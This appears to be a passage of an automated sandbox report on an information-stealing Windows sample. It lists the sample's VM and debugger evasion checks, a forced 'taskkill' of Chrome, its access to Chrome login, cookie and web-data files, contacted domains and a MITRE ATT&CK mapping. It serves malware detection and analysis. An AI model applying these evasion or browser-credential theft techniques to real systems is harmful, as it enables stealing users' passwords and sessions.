Source: 83C12B0D0FA88B10.exe, 00000002.00000003.257498320.0000000000AA4000.00000004.00000040.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}J<
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273150697.000000000071C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.272267812.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.308204818.0000000000AA9000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}J<
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.272267812.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.257422967.0000000002D41000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}.?
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273150697.000000000071C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWa36e971e03d9cbf8.com
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.257066545.0000000002D70000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.260160543.0000000002991000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.280620377.0000000002F4A000.00000004.00000001.sdmpBinary or memory string: {72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}@
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.260211924.0000000002B54000.00000004.00000040.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.280801586.0000000003ED1000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: C:\Users\user\AppData\Roaming\1615173766196.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001A050 GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_1001A050
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\IpB8f8qwze.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042A845 IsDebuggerPresent,0_2_0042A845
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042D33A EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042D33A
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042D33A EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042D33A
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004279FB mov eax, dword ptr fs:[00000030h]0_2_004279FB
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019E40 mov eax, dword ptr fs:[00000030h]0_2_10019E40
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]0_2_10019E70
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]0_2_10019E70
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]0_2_10019ED0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]0_2_10019ED0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019F30 mov eax, dword ptr fs:[00000030h]0_2_10019F30
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10019E40 mov eax, dword ptr fs:[00000030h]2_2_10019E40
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]2_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]2_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10019F30 mov eax, dword ptr fs:[00000030h]2_2_10019F30
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00431078 GetProcessHeap,HeapAlloc,0_2_00431078
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042A5C4 SetUnhandledExceptionFilter,0_2_0042A5C4
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042A5E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A5E7
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000F05C
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer,0_2_100153B4
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter,0_2_100153D6
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_10018473
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000E4AD
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1000F05C
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer,2_2_100153B4
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter,2_2_100153D6
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,2_2_10018473
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1000E4AD
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_0114631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0114631F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_0114373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0114373A
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_0114461F SetUnhandledExceptionFilter,23_2_0114461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_01141C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_01141C57
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00432C36 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_00432C36
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004360F6 AllocateAndInitializeSid,CheckTokenMembership,0_2_004360F6
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042AA43 cpuid 0_2_0042AA43
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: GetLocaleInfoA,0_2_10017D50
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: GetLocaleInfoA,2_2_10017D50
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: GetLocaleInfoA,23_2_01147189
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,0_2_100197E0
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0040F31A ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_0040F31A
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042A173 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0042A173
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00402B28 GetUserNameW,GetLastError,0_2_00402B28
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00438B07 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_00438B07
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00436186 GetVersionExW,0_2_00436186
Source: C:\Users\user\Desktop\IpB8f8qwze.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistoryJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery12Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsCommand and Scripting Interpreter2Windows Service1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsService Execution1Browser Extensions1Windows Service1Install Root Certificate2NTDSFile and Directory Discovery3Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronBootkit1Process Injection12Software Packing1LSA SecretsSystem Information Discovery57SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsQuery Registry2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncSecurity Software Discovery461Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion13Proc FilesystemVirtualization/Sandbox Evasion13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronBootkit1Input CaptureRemote System Discovery11Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Network Configuration Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 364295 Sample: IpB8f8qwze.exe Startdate: 07/03/2021 Architecture: WINDOWS Score: 90 106 Multi AV Scanner detection for domain / URL 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 Multi AV Scanner detection for submitted file 2->110 112 3 other signatures 2->112 8 IpB8f8qwze.exe 1 3 2->8         started        13 msiexec.exe 2->13         started        process3 dnsIp4 72 9a3a97f6f45f2c2b.com 104.21.6.78, 49719, 49722, 49725 CLOUDFLARENETUS United States 8->72 74 c41676c07a61a961.com 8->74 76 a36e971e03d9cbf8.com 8->76 68 C:\Users\user\...\83C12B0D0FA88B10.exe, PE32 8->68 dropped 70 C:\...\83C12B0D0FA88B10.exe:Zone.Identifier, ASCII 8->70 dropped 114 Installs new ROOT certificates 8->114 116 Contains functionality to infect the boot sector 8->116 118 Registers a new ROOT certificate 8->118 120 3 other signatures 8->120 15 83C12B0D0FA88B10.exe 26 8->15         started        20 83C12B0D0FA88B10.exe 1 15 8->20         started        22 cmd.exe 1 8->22         started        24 msiexec.exe 4 8->24         started        file5 signatures6 process7 dnsIp8 80 c41676c07a61a961.com 15->80 82 a36e971e03d9cbf8.com 15->82 92 5 other IPs or domains 15->92 54 C:\Users\user\AppData\...\1615173766196.exe, PE32 15->54 dropped 56 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 15->56 dropped 58 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 15->58 dropped 66 7 other files (none is malicious) 15->66 dropped 94 Multi AV Scanner detection for dropped file 15->94 96 Detected unpacking (creates a PE file in dynamic memory) 15->96 98 Contains functionality to infect the boot sector 15->98 100 Contains functionality to detect sleep reduction / modifications 15->100 26 cmd.exe 15->26         started        29 1615173766196.exe 2 15->29         started        31 ThunderFW.exe 2 15->31         started        84 c41676c07a61a961.com 20->84 86 a36e971e03d9cbf8.com 20->86 88 9a3a97f6f45f2c2b.com 20->88 60 C:\Users\user\AppData\...\Secure Preferences, UTF-8 20->60 dropped 62 C:\Users\user\AppData\Local\...\Preferences, ASCII 20->62 dropped 102 Tries to harvest and steal browser information (history, passwords, etc) 20->102 33 cmd.exe 1 20->33         started        35 cmd.exe 1 20->35         started        90 127.0.0.1 unknown unknown 22->90 104 Uses ping.exe to sleep 22->104 37 conhost.exe 22->37         started        39 PING.EXE 1 22->39         started        64 C:\Users\user\AppData\Local\...\MSI75EE.tmp, PE32 24->64 dropped file9 signatures10 process11 signatures12 41 conhost.exe 26->41         started        43 PING.EXE 26->43         started        122 Uses ping.exe to sleep 33->122 45 PING.EXE 1 33->45         started        48 conhost.exe 33->48         started        50 taskkill.exe 1 35->50         started        52 conhost.exe 35->52         started        process13 dnsIp14 78 192.168.2.1 unknown unknown 45->78

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

